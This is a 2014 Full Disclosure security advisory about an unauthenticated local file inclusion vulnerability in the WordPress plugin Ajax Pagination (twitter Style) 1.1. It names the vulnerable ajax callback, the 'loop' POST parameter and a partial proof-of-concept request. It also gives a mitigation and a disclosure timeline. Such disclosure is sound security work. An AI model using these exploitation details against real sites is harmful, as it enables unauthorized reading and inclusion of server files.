Date: Fri, 28 Mar 2014 12:34:47 +0000
From: Harry Metcalfe <harry@....com>
To: fulldisclosure@...lists.org
Subject: [FD] End-user exploitable local file inclusion vulnerability in
 Ajax Pagination (twitter Style) 1.1 (WordPress plugin)

Details
================
Software: Ajax Pagination (twitter Style)
Version: 1.1
Homepage: http://wordpress.org/plugins/ajax-pagination/
CVSS: 9.3 (High; AV:N/AC:M/Au:N/C:C/I:C/A:C)

Description
================
End-user exploitable local file inclusion vulnerability in Ajax
Pagination (twitter Style) 1.1

Vulnerability
================
This plugin contains a file inclusion vulnerability that is exploitable
by an unauthenticated user. The user can include any local file ending
in “.php” which is accessible to the web user.

Proof of concept
================
A non-logged in user can call the ajax function
wp_ajax_nopriv_ajax_navigation that calls ajax_navigation_callback in
ajax-pagination-front.php at line 75.
By setting the value of “loop” in the POST data, they can include the
contents of that path on the returned page.
For example, to include the contents of wp-login.php in the returned
page, send the following:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1

Mitigations
================
Disable the plugin until a fix is available.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our
disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@....com to acknowledge this report if you
received it via a third party (for example, plugins@...dpress.org) as
they generally cannot communicate with us on your behalf.

Please note that this vulnerability will be published if we do not
receive a response to this report with 14 days.

Timeline

2014-02-18: Reported to nuwan28@...il.com and plugins@...dpress.org
2014-03-28: No response received to reports. Vulnerability published.

Discovered by dxw: